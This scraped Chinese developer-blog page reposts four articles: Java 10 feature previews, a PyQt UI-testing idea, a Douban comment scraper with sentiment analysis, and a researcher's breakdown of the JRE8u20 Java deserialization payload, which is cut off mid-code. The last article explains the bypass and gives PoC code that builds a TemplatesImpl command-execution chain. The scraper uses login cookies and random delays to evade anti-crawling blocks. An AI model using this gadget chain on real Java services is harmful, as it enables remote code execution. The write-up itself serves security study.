开发者博客 – IT技术 尽在开发者博客

开发者博客 – 科技是第一生产力


  • 首页

  • 归档

  • 搜索

Java 10 新特性前瞻

发表于 2017-11-23

从Java 9发布到现在已经过去两个月了,根据最新的发布计划,距离下一个Java版本发布只有四个月时间。Java 10的新特性还在确认当中,所以从现在到GA版中间还是有可能加入重大的变更。不管怎样,在这四个月里,开发者还是可以期待一些新的特性能够被添加到Java 10中。

新的特性和增强一般通过Java Enhancement Process(JEP)或Java Community Process标准请求(JSR)进行跟踪。因为Java 10的时间线较短,范围也相对较小,所以Java 10的变更将通过JEP进行跟踪。

有望被包含在Java 10中的特性是那些已经处于Targeted或Proposed状态的JEP,它们包括:

  • 286:本地变量类型推断
  • 296:统一JDK仓库
  • 304:垃圾回收器接口
  • 307:G1的并行Full GC
  • 310:应用程序类数据共享
  • 312:ThreadLocal握手机制

JEP 296是一次纯粹的清理工作,而JEP 304加强了不同垃圾回收器的代码隔离,并为垃圾回收器引入更简洁的接口。

JEP 304意味着厂商可以更自由地选择特定的GC算法来构建JDK,因为现在有多种处于开发当中的GC,如Shenandoah、ZGC和Epsilon,在未来可以使用这些GC算法。社区也在努力
弃用甚至移除Concurrent Mark Sweep(CMS)垃圾回收器,只是目前还没有可用的替代品。

比较有意思的变更或许是JEP 286,增强的本地变量类型推断可以让开发者免去很多变量申明模板代码。也就是说,在下一个版本中,下面的变量声明是合法的:

1
2
复制代码__Thu Nov 23 2017 13:49:56 GMT+0800 (CST)____Thu Nov 23 2017 13:49:56 GMT+0800 (CST)__var list = new ArrayList<String>();  // infers ArrayList<String>
var stream = list.stream(); // infers Stream<String>__Thu Nov 23 2017 13:49:56 GMT+0800 (CST)____Thu Nov 23 2017 13:49:56 GMT+0800 (CST)__

这种语法只限于初始化过的本地变量和for循环中的本地变量。

它其实是个语法糖,在语义上并没有任何变化。不过,该特性有可能在Java开发者当中引起热议。

其他三个变更都将在性能方面带来一些影响。

JEP 307解决了G1垃圾回收器的一个问题——截止到Java 9,G1的Full GC采用的是单线程算法。也就是说,G1在发生Full GC时会严重影响性能。JEP 307的目的就是要采用并行GC算法,在发生Full GC时可以使用多个线程进行并行回收。

JEP 310对类数据共享(CDS)进行了扩展,JVM可以将一些类记录到一个共享的压缩文件里,在JVM下一次启动时可以将这个文件映射到JVM进程,以此来减少启动时间。该文件也可以在多个JVM间共享,在同一个机器上运行多个JVM时,这样做可以减少内存占用。

该功能在Java 5中就已存在,但截止到Java 9,该功能只允许bootstrap类加载器加载压缩的类。JEP 310的目的是扩展该功能,让应用程序和自定义类加载器也能加载压缩的类。该特性目前仅在Oracle JDK中可用,OpenJDK并不包含该特性。

JEP计划将该特性从Oracle私有仓库中迁移到公共仓库,从Java 10往后,常规版本(非LTS)将会使用OpenJDK的二进制包。此举表明有用户正在使用该特性,所以需要在OpenJDK中也支持该特性。

JEP 312旨在改进虚拟机性能,在应用程序线程上调用回调不再需要执行全局虚拟机安全点操作,这意味着JVM可以停止单个线程。一些底层小改进包括:

  • 降低堆栈跟踪取样所带来的影响(如进行profiling)。
  • 减少信号依赖以获得更好的堆栈取样。
  • 通过停止单独线程改进偏向锁。
  • 从JVM移除了一些内存屏障。

从整体来看,Java 10似乎并没有包含重大新特性或性能改进。这是可以理解的,毕竟这是新发布周期下的第一个版本。

查看英文原文:Java 10 - The Story So Far

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

PyQt的一个UI单元测试框架思路

发表于 2017-11-23

1、思路

PyQt是个 相当灵活的UI框架,不过,这个Qt的Python版本一直没有一个好用的针对UI的单元测试工具。

PyQt里的逻辑层都是采用信号槽的方式连接的,我们可以通过拦截并重建信号槽的方式,动态生成一个单元测试的脚本。按这个思路写了一个单元测试的工具。如果需要的人多的话,我就把这个模块做成一个单元测试的框架。

2、demo

一个好用的工具应该是非侵入式的,接口合理且命名规范,符合大多数人使用习惯的,我认为这样一个PyQt的单元测试用例应该长这样子。

1
2
3
4
5
6
7
8
9
10
11
12
13
复制代码def knife_into_view(view_instance):
knife = Knife(view_instance)
knife.view.target_button.clicked()
sleep(10)
text = view_instance._view.show.text()
assert text == "target"

def test_start_main_ui()
app = QApplication(sys.argv)
view = View()
threading.Thread(target=knife_into_view, args=(view,)).start()
view.show()
sys.exit(app.exec_())

主要的动作就是,按照源代码中按钮的信号槽连接的调用链,触发按钮的点击实践,执行点击按钮后的逻辑。

在上述代码中,首先单元测试的入口是启动界面的代码,也就是test_start_main_ui函数,这段代码是最简单的一个PyQt的界面启动代码,其中不一样的是启动了一个线程用于执行单元测试。

而单元测试的函数是这样的,首先初始化一个参数为view的实例的类,这个类用于拦截信号槽,并执行信号动作,我把这个类命名为Knife。

接下来就是执行view下面的target_button的点击事件,这一系列的成员函数是根据原始view里面的信号槽连接代码动态生成的,后面会讲具体方法。

触发点击事件后,结果显示在一个label上,assert一下这个结果是否正确就行了。


GIF是一个演示实例,QLineEdit里面输入一个数,按一下-1s的按钮(QPushButton),会在最右的label上将该数减一之后显示,Demo GUI部分的代码看这里。

3、Qt与PyQt

Qt中信号槽是个不可或缺的概念,和元对象系统之类的东西组成了Qt的基础组件。但对于起源于上古时代的Qt,这些东西很多是为了弥补当时C++的不足,对于Python这种强类型的语言来说并不是那么不可或缺,比如信号槽本质上就是观察者模式,完全可以自己实现一个,我自己的实现可以看这里。

而Qt的元对象系统是一个代码生成框架,给C++提供了自省的能力,但Python这种动态语言在语言层面上就有强大的自省功能,所以我平时用PyQt的时候一般就把它当一个UI库用,其他的东西比如线程、信号槽、串口等都用Python版本的。

4、拦截的实现

在PyQt中,信号槽连接的写法一般是这样的。

1
复制代码signal_instance.connect(slot_name)

所以,我这个版本的拦截信号槽的功能的实现思路就是用正则匹配源代码,从符合这一模式的

语句中解析出信号的发送端和槽函数,将槽函数重新添加进新的生成的自定义信号槽中。

信号槽重连接

之前说Python的自省能力强大,现在有个非常实际的例子就是,在Python中可以动态的获取源代码。这个功能用到的Python 标准库中的inpect库,示例如下。

1
2
复制代码import inspect
print inspect.getsource(inspect.isclass)

这段代码的功能是将inspect库中的isclass函数的源代码打印出来。inspect模块是个很神奇的模块,如果你对闭包和协程不理解的话也可以调用该模块中的相应代码看看。

在程序中还用到了__code__.co_names这个东西,用来高效的查看函数的源代码里有没有”connect”字符串。

5、程序结构

这里是部分程序源代码,省略了代码细节,源代码可以看这个git仓库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
复制代码class SubNode(object):
def __init__(self):
self.funs = []

def __setattr__(self, key, value):
self.__dict__[key] = value

def __call__(self, *args, **kwargs):
[f() for f in self.funs]


class FailAttr(ValueError):
""" can't get attr correct"""


class Knife(object):
def __new__(cls, widget_instance):
pars = cls.parser_slots(widget_instance)
cls.recover_slots(pars, widget_instance)
return object.__new__(cls)

@staticmethod
def parser_slots(widget_instance):
#codes

@classmethod
def recover_slots(cls, pars, widget_instance):
def get_attrs(instance, attrs):
#codes

def set_attrs(cls, attrs, fun):
#codes
#codes
return cls

这里用一个叫Knife的类来实现,在重建新的信号函数的时候我希望信号函数的调用方式和程序源代码里的调用方式保持一致,这里就得采用动态的生成方式。而涉及到类成员的动态生成,采取一种不一样的写法比较好,比如把生成的时间从__init__方法中提前到__new__方法中。

widget_instance就是包含信号槽的类,因为我写GUI都是采用MVC的方式,需要导出并拦截的信号槽都在一个类里面,这个类传入的时候已经是个实例了。动态解析该实例源代码,并动态生成新的信号去装载信号槽。

其中,还有个问题,有些调用可能嵌套的好几层,比如像这样。

1
复制代码self.mother.father.son.dog.clicked()

这样的操作需要用递归生成,就像这样。

1
2
3
4
5
6
7
8
复制代码      def set_attrs(cls, attrs, fun):
if attrs:
now_attrs = attrs[0]
if not hasattr(cls, now_attrs):
setattr(cls, now_attrs, SubNode())
return set_attrs(getattr(cls, now_attrs), attrs[1:], fun)
else:
cls.funs.append(fun)

调用链中自定义生成的节点类为SubNode,槽函数如果动态获取不到时,会返回一个自定义异常FailAttr。

具体的请看Github

6、知识点详解

这一栏列出一些特殊的知识点。

  • getattr,setattr,hasattr:动态的获取对象的方法,给一个对象动态的添加方法,判断一个对象是否含有某方法。
  • __new__魔法方法:这个方法在__init__之前,是真正的类初始化函数。要注意的是new方法需要返回的是类实例,就像源代码中的写法。而在__new__方法中是使用不了实例方法的,得用staticmethod和classmethod装饰器去修饰。
  • staticmethod,classmethod:都是类方法的装饰器,只不过classmethod装饰过的成员方法第一个参数是cls,staticmethod装饰过的东西不引入这个参数,相当于一个纯函数,叫做静态方法。这里的两个函数都可以用classmethod装饰,不过parser_slots函数中用不到cls,我就用staticmethod装饰了。
  • 用类方法去区别一些特殊操作,这一方式最常见的就是Django的ORM,将数据库操作和表单的定义分为类方法和成员方法。所以大家理解不了类方法和元类的时候可以去研究下Django的ORM。
  • 列表生成式和正则表达式之类的就不解释了。

感觉篇幅有点长,其他的细节如果有需要的话在下一篇文章里解释。如果大家真需要,可以考虑专门搞成一个开源项目。

GitHub仓库:

lidingke/fiberGeometry

参考文献:

PyQt信号槽的Python实现

我的专栏:

python杂七杂八的使用经验

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

用 Python 分析胡歌的《猎场》到底值不值得看?

发表于 2017-11-23

已经授权CSDN公众号、CSDN网站进行发布。获取授权,请联系作者,谢谢!

11月6日,湖南卫视已经开播被称作年度压轴的大戏“猎场”,迅速占领各大榜单,成为一部高热度的电视剧。但是在豆瓣上却形成了两极分化。截止11月8日,该剧在豆瓣上的评分为5.7分。相比较胡歌之前《琅琊榜》的9.1,《伪装者》的8.3等来说,这一评分确实不高。有趣的是,首页的评分比例与“短评”“剧评”的比例存在非常大的差异!


首页总评分评分两级分化严重,“差评”占主 在目前11463个评价中两级分化严重,“1星”占比最高为28.6%,其次为“5星”的25.4%。“好评”(5星、4星)占比为35.80%,“一般”(3星)为16.50%,“差评”(2星、1星)占比为47.80%。很明显,“差评”占了接近一半的比例。


《猎场》豆瓣评分占比分布 在短评和剧评中的另一种景象 首页的豆瓣评分中“差评”占比很高,但是在豆瓣的短评和剧评中却是另一番景象。 在目前5979条短评中,“好评”占比71%,“一般”为5%,“差评”占比24%。而在392条剧评中,“5星”占了非常高的比例!84.7%的剧评给了“好评”。


《猎场》剧评评分分布 我们将三个位置的评分放在一起比较就会出现非常明显的差异。根据这个差异,我们可以大致判断:写出短评或者剧评的观众大部分给予了“好评”,但仍有大量观众直接给了差评,并没有说明任何原因。当然,我们并没有考虑那些不写评论,而只是点“有用”和“没用”观众。


才刚刚上映,剧情还在慢慢的铺,所以现在给整部剧下定论还太早。

《猎场》到底好不好看?我们还是想通过以11月8日为界,看看人们短评人的情绪,是积极,还是消极。利用词云看看大家都说了什么,希望能大家就是否建议观看给出建议。

一、爬取《猎场》热门短评,豆瓣的反爬虫做的比较好,不登录爬虫很快就会被屏蔽掉,登录后获取cookies 如下:


同时建议在循环抓取的时候进行sleep,例如:

time.sleep(1 + float(random.randint(1, 100)) / 20)

《猎场》热门短评内容和时间爬取了22440条评论,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
复制代码import re
import requests
import codecs
import time
import random
from bs4 import BeautifulSoup
absolute = 'https://movie.douban.com/subject/26322642/comments'
absolute_url = 'https://movie.douban.com/subject/26322642/comments?start=23&limit=20&sort=new_score&status=P&percent_type='
url = 'https://movie.douban.com/subject/26322642/comments?start={}&limit=20&sort=new_score&status=P'
header={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0','Connection':'keep-alive'}
def get_data(html):
soup=BeautifulSoup(html,'lxml')
comment_list = soup.select('.comment > p')
next_page= soup.select('#paginator > a')[2].get('href')
date_nodes = soup.select('..comment-time')
return comment_list,next_page,date_nodes
if __name__ == '__main__':
f_cookies = open('cookie.txt', 'r')
cookies = {}
for line in f_cookies.read().split(';'):
name, value = line.strip().split('=', 1)
cookies[name] = value
html = requests.get(absolute_url, cookies=cookies, headers=header).content
comment_list = []
# 获取评论
comment_list, next_page,date_nodes= get_data(html,)
soup = BeautifulSoup(html, 'lxml')
comment_list = []
while (next_page != []): #查看“下一页”的A标签链接
print(absolute + next_page)
html = requests.get(absolute + next_page, cookies=cookies, headers=header).content
soup = BeautifulSoup(html, 'lxml')
comment_list, next_page,date_nodes = get_data(html)
with open("comments.txt", 'a', encoding='utf-8')as f:
for node in comment_list:
comment = node.get_text().strip().replace("\n", "")
for date in date_nodes:
date= node.get_text().strip()
f.writelines((comment,date) + u'\n')
time.sleep(1 + float(random.randint(1, 100)) / 20)

三、对数据进行清洗:

1
2
3
4
5
复制代码import pandas as pd
import matplotlib.pyplot as plt
date_name=['date','comment']
df = pd.read_csv('./comment.csv',header=None,names=date_name,encoding= 'gbk')
df['date'] = pd.to_datetime(df['date'])

样本数量:

1
2
复制代码print(df['date'].value_counts())
获取2017-11-06 – 2017-11-08 数据:

1
2
3
4
5
6
7
8
9
复制代码data6 = df['2017-11-06':'2017-11-08']
data6.to_csv('6.txt', encoding = 'utf-8', index = False)
print(data6.size)
5775
获取2017-11-09 – 2017-11-17 数据:
data9 = df['2017-11-09':'2017-11-17']
data9.to_csv('9.txt', encoding = 'utf-8', index = False)
print(data9.size)
16665

四、情感分析和词云

对热门短评基于原有SnowNLP进行积极和消极情感分类,读取每段评论并依次进行情感值分析(代码:zhuanlan.zhihu.com/p/30107203),最后会计算出来一个0-1之间的值。


当值大于0.5时代表句子的情感极性偏向积极,当分值小于0.5时,情感极性偏向消极,当然越偏向两边,情绪越偏激。

2017-11-06 – 2017-11-08 分析:


从上图情感分析(代码:zhuanlan.zhihu.com/p/30107203)来看,影评者还是还是非常积极的,对《猎场》的期望很高。


从词云(代码:zhuanlan.zhihu.com/p/30107203)上来看:

2017-11-09 – 2017-11-17分析


从上图情感分析(代码:zhuanlan.zhihu.com/p/30107203)来看,积极的情绪已经远远超过消极的情绪,还是受到大家的好评。


从词云(代码:zhuanlan.zhihu.com/p/30107203)上来看,出现好看、剧情、期待、喜欢等词。

总结:

词云的背景是胡歌,大家看出来了嘛?目前豆瓣的分数已经是6.2分,目前剧情过半,相信接下来会更精彩,个人认为分数会在7.5分以上。


抛开豆瓣的推荐分数,通过的热门短评的情感和词云分析,是一部不错的现实剧,剧情犀利、深刻、启迪,很多人期待。如果您有时间,不妨看一下,或许能收获一些意想不到的东西。


作者:布道,大型互联网公司运维技术负责人,拥有10年的互联网开发和运维经验。一直致力于运维工具的开发和运维专家服务的推进,赋能开发,提高效能。 广告时间:最后给自己代个盐~~欢迎大家有空时翻下我牌子,看看之前的文章,再点个赞呗。顺便关注下专栏“开发运维”。


更多精彩请点击:

XSS常见攻击与防御

利用500W条微博语料对评论进行情感分析

还在手调网络权限?资深IT工程师都这样玩企业组网

微服务在互联网公司演进过程

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

深度 - Java 反序列化 Payload 之 JRE8u

发表于 2017-11-23

(360 A-TEAM 长期招收高级安全研究人员,APT 攻防人员,请联系 wufangdong@360.net)


正文

JRE8u20 是由 pwntester 基于另外两位黑客的代码改造出来的。因为此 payload 涉及到手动构造序列化字节流,使得它与 ysoserial 框架中所有的 payload 的代码结构都不太一样,所以没有被集成到 ysoserial 框架中。此 payload 在国内没有受到太大的关注也许与这个原因有关。我对此 payload 进行了相对深入的研究,学到了不少东西,在此与大家分享。

需要知道的背景知识

  1. 此 payload 是 ysoserial 中 Jdk7u21 的升级版,所以你需要知道 Jdk7u21 的工作原理
  2. 你需要对序列化数据的二进制结构有一些了解,serializationdumper 在这一点上可以帮到你。

简述 Jdk7u21

网上有不少人已经详细分析过 Jdk7u21 了,有兴趣大家自己去找找看。

大概流程如下:

  1. TemplatesImpl 类可被序列化,并且其内部名为 __bytecodes 的成员可以用来存储某个 class 的字节数据
  2. 通过 TemplatesImpl 类的 getOutputProperties 方法可以最终导致 __bytecodes 所存储的字节数据被转换成为一个 Class(通过 ClassLoader.defineClass),并实例化此 Class,导致 Class 的构造方法中的代码被执行。
  3. 利用 LinkedHashSet 与 AnnotationInvocationHandler 来触发 TemplatesImpl 的 getOutputProperties 方法。这里的流程有点多,不展开了。

Jdk7u21 的修补

Jdk7u21 如其名只能工作在 7u21 及之前的版本,因为在后续的版本中,此 payload 依赖的 AnnotationInvocationHandler 的反序列化逻辑发生了改变。其 readObject 方法中加入了一个如下的检查:

1
复制代码private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {    var1.defaultReadObject();    AnnotationType var2 = null;    try {        var2 = AnnotationType.getInstance(this.type);    } catch (IllegalArgumentException var9) {        throw new InvalidObjectException("Non-annotation type in annotation serial stream");    }/// 省略了后续代码}

可以看到在反序列化 AnnotationInvocationHandler 的过程中,如果 this.type 的值不是注解类型的,则会抛出异常,这个异常会打断整个反序列化的流程。而 7u21 的 payload 里面,我们需要 this.type 的值为 Templates.class 才可以,否则我们是无法利用 AnnotationInvocationHandler 来调用到 getOutputProperties 方法。正是这个异常,使得此
payload 在后续的JRE 版本中失效了。强行使用的话会看到如下的错误:


Exception in thread “main” java.io.InvalidObjectException: Non-annotation type in annotation serial stream

at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:341)

…..


绕过的思路

仔细看 AnnotationInvocationHandler.readObject 方法中的代码你会发现大概步骤是:

  1. var1.defaultReadObject();
  2. 检查 this.type,非注解类型则抛出异常。

代码中先利用 var1.defaultReadObject() 来还原了对象(从反序列化流中还原了 AnnotationInvocationHandler 的所有成员的值),然后再进行异常的抛出。也就是说,AnnotationInvocationHandler 这个对象是先被成功还原,然后再抛出的异常。这里给了我们可趁之机。


(以下所有的内容我会省略大量的细节,为了更好的理解建议各位去学习一下 Java 序列化的规范。)


一些小实验

实验 1:序列化中的引用机制

1
复制代码ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("/tmp/ser")));Date d = new Date();out.writeObject(d);out.writeObject(d);out.close();

向 /tmp/ser 中写入了两个对象,利用 serializationdump 查看一下写入的序列化结构如下。

STREAM_MAGIC - 0xac ed

STREAM_VERSION - 0x00 05

Contents

TC_OBJECT - 0x73 // 这里是第一个 writeObject 写入的 date 对象

TC\_CLASSDESC - 0x72


  className


    Length - 14 - 0x00 0e


    Value - java.util.Date - 0x6a6176612e7574696c2e44617465


  serialVersionUID - 0x68 6a 81 01 4b 59 74 19


  newHandle 0x00 7e 00 00


  classDescFlags - 0x03 - SC\_WRITE\_METHOD | SC\_SERIALIZABLE


  fieldCount - 0 - 0x00 00


  classAnnotations


    TC\_ENDBLOCKDATA - 0x78


  superClassDesc


    TC\_NULL - 0x70


newHandle 0x00 7e 00 01 **// 为此对象分配一个值为 0x00 7e 00 01 的 handle,要注意的是这个 handle 并没有被真正写入文件,而是在序列化和反序列化的过程中计算出来的。serializationdumper 这个工具在这里将它显示出来只是为了方便分析。** 


classdata


  java.util.Date


    values


    objectAnnotation


      TC\_BLOCKDATA - 0x77


        Length - 8 - 0x08


        Contents - 0x0000015fd4b76bb1


      TC\_ENDBLOCKDATA - 0x78

TC_REFERENCE - 0x71 // 这里是第二个 writeObject 对象写入的 date 对象

Handle - 8257537 - 0x00 7e 00 01

可以发现,因为我们两次 writeObject 写入的其实是同一个对象,所以 Date 对象的数据只在第一次 writeObject 的时候被真实写入了。而第二次 writeObject 时,写入的是一个 TC_REFERENCE 的结构,随后跟了一个4 字节的 Int 值,值为 0x00 7e 00 01。这是什么意思呢?意思就是第二个对象引用的其实是 handle 为 0x00 7e 00 01 的那个对象。

在反序列化进行读取的时候,因为之前进行了两次 writeObject,所以为了读取,也应该进行两次 readObject:

  1. 第一次 readObject 将会读取 TC_OBJECT 表示的第 1 个对象,发现是 Date 类型的对象,然后从流中读取此对象成员的值并还原。并为此 Date 对象分配一个值为 0x00 7e 00 01 的 handle。
  2. 第二个 readObject 会读取到 TC_REFERENCE,说明是一个引用,引用的是刚才还原出来的那个 Date 对象,此时将直接返回之前那个 Date 对象的引用。

实验 2:还原 readObject 中会抛出异常的对象

看实验标题你就知道,这是为了还原 AnnotationInvocationHandler 而做的简化版的实验。

假设有如下 Passcode 类

1
复制代码public class Passcode implements Serializable {    private static final long serialVersionUID = 100L;    private String passcode;        public Passcode(String passcode) {        this.passcode = passcode;    }    private void readObject(ObjectInputStream input)     throws Exception {        input.defaultReadObject();        if (!this.passcode.equals("root")) {            throw new Exception("pass code is not correct");        }    }}

根据 readObject 中的逻辑,似乎我们只能还原一个 passcode 成员值为 root 的对象,因为如果不是 root ,就会有异常来打断反序列化的操作。那么我们如何还原出一个 passcode 值不是 root 的对象呢?我们需要其他类的帮助。

假设有一个如下的 WrapperClass 类:

1
复制代码public class WrapperClass implements Serializable {    private static final long serialVersionUID = 200L;    private void readObject(ObjectInputStream input)     throws Exception {        input.defaultReadObject();        try {            input.readObject();        } catch (Exception e) {            System.out.println("WrapperClass.readObject: input.readObject error");        }    }}

此类在自身 readObject 的方法内,在一个 try/catch 块里进行了 input.readObject 来读取当前对象数据区块中的下一个对象。

解惑

假设我们生成如下二进制结构的序列化文件(简化版):

STREAM_MAGIC - 0xac ed

STREAM_VERSION - 0x00 05

Contents

TC_OBJECT - 0x73 // WrapperClass 对象

TC\_CLASSDESC - 0x72


  ...


  // 省略,当然这里的flag 要被标记为 SC\_SERIALIZABLE | SC\_WRITE\_METHOD


classdata // 这里是 WrapperClass 对象的数据区域


  TC\_OBJECT - 0x73 **// 这里是 passcode 值为 "wrong passcode" 的 Passcode 类对象,并且在反序列化的过程中为此对象分配 Handle,假如说为 0x00 7e 00 03** 


    ...

TC_REFERENCE - 0x71

Handle - 8257537 - 0x00 7e 00 03 // 这里重新引用上面的那个 Passcode 对象

WrapperClass.readObject 会利用 input.readObject 来尝试读取并还原 Passcode 对象。虽然在还原 Passcode 对象时,出现了异常,但是被 try/catch 住了,所以序列化的流程没有被打断。Passcode 对象被正常生成了并且被分配了一个值为 0x00 7e 00 03 的 handle。随后流里出现了 TC_REFERENCE 重新指向了之前生成的那个 Passcode 对象,这样我们就可以得到一个在正常情况下无法得到的
passcode 成员值为 “wrong passcode” 的 Passcode 类对象。

读取的时候需要用如下代码进行两次 readObject:

1
复制代码ObjectInputStream in = new ObjectInputStream(new FileInputStream(new File("/tmp/ser")));in.readObject(); // 第一次,读出 Wrapper ClassSystem.out.println(in.readObject()); // 第二次,读出 Passcode 对象

实验 3:利用 SerialWriter 给对象插入假成员

SerialWriter 是我自己写的用于生成自定义序列化数据的一个工具。它的主要亮点就在于可以很自由的生成与拼接任意序列化数据,可以很方便地做到 Java 原生序列化不容易做到的一些事情。它不完全地实现了 Java 序列化的一些规范。简单地理解就是 SerialWriter 是我写的一个简化版的 ObjectOutputStream。目前还不是很完善,以后我会将代码上传至 github。

如果用 SerialWriter 来生成实验 2 里面提到的那段序列化数据的话,代码如下:

1
复制代码public static void test2() throws Exception {    Serialization ser = new Serialization();    // wrong passcode ,反序列化时会出现异常    Passcode passcode = new Passcode("wrong passcode");     TCClassDesc desc = new TCClassDesc(    "util.n1nty.testpayload.WrapperClass", (byte)(SC_SERIALIZABLE | SC_WRITE_METHOD));    TCObject.ObjectData data = new TCObject.ObjectData();    // 将 passcode 添加到 WrapperClass 对象的数据区    // 使得 WrapperClass.readObject 内部的 input.readObject     // 可以将它读出    data.addData(passcode);     TCObject obj = new TCObject(ser);    obj.addClassDescData(desc, data, true);    ser.addObject(obj);    // 这里最终写入的是一个 TC_REFERENCE    ser.addObject(passcode);     ser.write("/tmp/ser");    ObjectInputStream in = new ObjectInputStream(    new FileInputStream(new File("/tmp/ser")));    in.readObject();    System.out.println(in.readObject());}

给对象插入假成员

什么意思呢?序列化数据中,有一段名为 TC_CLASSDESC 的数据结构,此数据结构中保存了被序列化的对象所属的类的成员结构(有多少个成员,分别叫什么名字,以及都是什么类型的。)

还是拿上面的 Passcode 类来做例子,序列化一个 Passcode 类的对象后,你会发现它的 TC_CLASSDESC 的结构如下:

TC_CLASSDESC - 0x72

className


  Length - 31 - 0x00 1f    **// 类名长度** 


  Value - util.n1nty.testpayload.Passcode - 0x7574696c2e6e316e74792e746573747061796c6f61642e50617373636f6465 **//类名** 


serialVersionUID - 0x00 00 00 00 00 00 00 64


newHandle 0x00 7e 00 02


classDescFlags - 0x02 - SC\_SERIALIZABLE


fieldCount - 1 - 0x00 01    **// 成员数量,只有 1 个** 


Fields


  0:


    Object - L - 0x4c    


    fieldName


      Length - 8 - 0x00 08    **// 成员名长度** 


      Value - passcode - 0x70617373636f6465    **// 成员名** 


    className1


      TC\_STRING - 0x74    


        newHandle 0x00 7e 00 03


        Length - 18 - 0x00 12    **// 成员类型名的长度** 


        Value - Ljava/lang/String; - 0x4c6a6176612f6c616e672f537472696e673b    **// 成员类型,为Ljava/lang/String;**

如果我们在这段结构中,插入一个 Passcode 类中根本不存在的成员,也不会有任何问题。这个虚假的值会被反序列化出来,但是最终会被抛弃掉,因为 Passcode 中不存在相应的成员。但是如果这个值是一个对象的话,反序列化机制会为这个值分配一个 Handle。JRE8u20 中利用到了这个技巧来生成 AnnotationInvocationHandler 并在随后的动态代理对象中引用它。利用 ObjectOutputStream 我们是无法做到添加假成员的,这种场景下
SerialWriter 就派上了用场。(类似的技巧还有:在 TC_CLASSDESC 中把一个类标记为 SC_WRITE_METHOD,然后就可以向这个类的数据区域尾部随意添加任何数据,这些数据都会在这个类被反序列化的同时也自动被反序列化)

回到主题 - Payload JRE8u20

上面已经分析过是什么问题导致了 Jdk7u21 不能在新版本中使用。也用了几个简单的实验来向大家展示了如何绕过这个问题。那么现在回到主题。

JRE8u20 中利用到了名为 java.beans.beancontext.BeanContextChild 的类。 此类与上面实验所用到的 WrapperClass 的作用是一样的,只不过稍复杂一些。

大体步骤如下:

  1. JRE8u20 中向 HashSet 的 TC_CLASSDESC 中添加了一个假属性,属性的值就是BeanContextChild 类的对象。
  2. BeanContextChild 在反序列化的过程中会读到 this.type 值为 Templates.class 的 AnnotationInvocationHandler 类的对象,因为 BeanContextChild 中有 try/catch,所以还原 AnnotationInvocationHandler 对象时出的异常被处理掉了,没有打断反序列化的逻辑。同时 AnnotationInvocationHandler 对象被分配了一个
    handle。
  3. 然后就是继续 Jdk7u21 的流程,后续的 payload 直接引用了之前创建出来的 AnnotationInvocationHandler 。

pwntester 在 github 上传了他改的 Poc,但是因为他直接将序列化文件的结构写在了 Java 文件的一个数组里面,而且对象间的 handle 与 TC_REFERENCE 的值都需要人工手动修正,所以非常不直观。而且手动修正 handle 是一个很烦人的事情。

为了证明我不是一个理论派 :-) ,我用 SerialWriter 重新实现了整个 Poc。代码如下:(手机端看不全代码,在电脑上看吧)

1
复制代码package util.n1nty.testpayload;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import util.Gadgets;import util.Reflections;import util.n1nty.gen.*;import javax.xml.transform.Templates;import java.beans.beancontext.BeanContextChild;import java.beans.beancontext.BeanContextSupport;import java.io.*;import java.util.HashMap;import java.util.Map;import static java.io.ObjectStreamConstants.*;public class TestRCE {    public static Templates makeTemplates(String command) {        TemplatesImpl templates = null;        try {            templates =  Gadgets.createTemplatesImpl(command);            Reflections.setFieldValue(templates, "_auxClasses", null);        } catch (Exception e) {            e.printStackTrace();        }        return templates;    }    public static TCObject makeHandler(HashMap map, Serialization ser) throws Exception {        TCObject handler = new TCObject(ser) {            @Override            public void doWrite(DataOutputStream out, HandleContainer handles) throws Exception {                ByteArrayOutputStream byteout = new ByteArrayOutputStream();                super.doWrite(new DataOutputStream(byteout), handles);                byte[] bytes = byteout.toByteArray();                /**                 * 去掉最后的 TC_ENDBLOCKDATA 字节。因为在反序列化 annotation invocation handler 的过程中会出现异常导致序列化的过程不能正常结束                 * 从而导致 TC_ENDBLOCKDATA 这个字节不能被正常吃掉                 * 我们就不能生成这个字节                 * */                out.write(bytes, 0, bytes.length -1);            }        };        // 手动添加  SC_WRITE_METHOD,否则会因为反序列化过程中的异常导致 ois.defaultDataEnd 为 true,导致流不可用。        TCClassDesc desc = new TCClassDesc("sun.reflect.annotation.AnnotationInvocationHandler", (byte)(SC_SERIALIZABLE | SC_WRITE_METHOD));        desc.addField(new TCClassDesc.Field("memberValues", Map.class));        desc.addField(new TCClassDesc.Field("type", Class.class));        TCObject.ObjectData data = new TCObject.ObjectData();        data.addData(map);        data.addData(Templates.class);        handler.addClassDescData(desc, data);        return handler;    }    public static TCObject makeBeanContextSupport(TCObject handler, Serialization ser) throws Exception {        TCObject obj = new TCObject(ser);        TCClassDesc beanContextSupportDesc = new TCClassDesc("java.beans.beancontext.BeanContextSupport");        TCClassDesc beanContextChildSupportDesc = new TCClassDesc("java.beans.beancontext.BeanContextChildSupport");        beanContextSupportDesc.addField(new TCClassDesc.Field("serializable", int.class));        TCObject.ObjectData beanContextSupportData = new TCObject.ObjectData();        beanContextSupportData.addData(1); // serializable        beanContextSupportData.addData(handler);        beanContextSupportData.addData(0, true); // 防止 deserialize 内再执行 readObject        beanContextChildSupportDesc.addField(new TCClassDesc.Field("beanContextChildPeer", BeanContextChild.class));        TCObject.ObjectData beanContextChildSupportData = new TCObject.ObjectData();        beanContextChildSupportData.addData(obj); // 指回被序列化的 BeanContextSupport 对象        obj.addClassDescData(beanContextSupportDesc, beanContextSupportData, true);        obj.addClassDescData(beanContextChildSupportDesc, beanContextChildSupportData);        return obj;    }    public static void main(String[] args) throws Exception {        Serialization ser = new Serialization();        Templates templates = makeTemplates("open /Applications/Calculator.app");        HashMap map = new HashMap();        map.put("f5a5a608", templates);        TCObject handler = makeHandler(map, ser);        TCObject linkedHashset = new 